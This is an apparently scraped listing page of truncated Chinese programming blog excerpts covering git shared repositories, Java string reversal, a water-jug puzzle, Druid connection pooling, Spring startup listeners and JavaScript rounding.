    转载自:   http://www.gitguys.com/topics/creating-a-shared-repository-users-sharing-the-repository/ Commands discussed in this section: git init –bare git clone git remote git pull git p
  • Java实现字符串反转的8种或9种方法 Josh_Persistence 异或反转递归反转二分交换反转java字符串反转栈反转
    注:对于第7种使用异或的方式来实现字符串的反转,如果不太看得明白的,可以参照另一篇博客: http://josh-persistence.iteye.com/blog/2205768   /** * */ package com.wsheng.aggregator.algorithm.string; import java.util.Stack; /**
  • 代码实现任意容量倒水问题 home198979 PHP算法倒水
    形象化设计模式实战             HELLO!架构                     redis命令源码解析   倒水问题:有两个杯子,一个A升,一个B升,水有无限多,现要求利用这两杯子装C
  • Druid datasource zhb8015 druid
    推荐大家使用数据库连接池 DruidDataSource. http://code.alibabatech.com/wiki/display/Druid/DruidDataSource DruidDataSource经过阿里巴巴数百个应用一年多生产环境运行验证,稳定可靠。 它最重要的特点是:监控、扩展和性能。 下载和Maven配置看这里: http
  • 两种启动监听器ApplicationListener和ServletContextListener spjich javaspring框架
    引言:有时候需要在项目初始化的时候进行一系列工作,比如初始化一个线程池,初始化配置文件,初始化缓存等等,这时候就需要用到启动监听器,下面分别介绍一下两种常用的项目启动监听器   ServletContextListener  特点: 依赖于sevlet容器,需要配置web.xml 使用方法: public class StartListener implements
  • JavaScript Rounding Methods of the Math object 何不笑 JavaScriptMath
        The next group of methods has to do with rounding decimal values into integers. Three methods — Math.ceil(),  Math.floor(), and  Math.round() — handle rounding in differen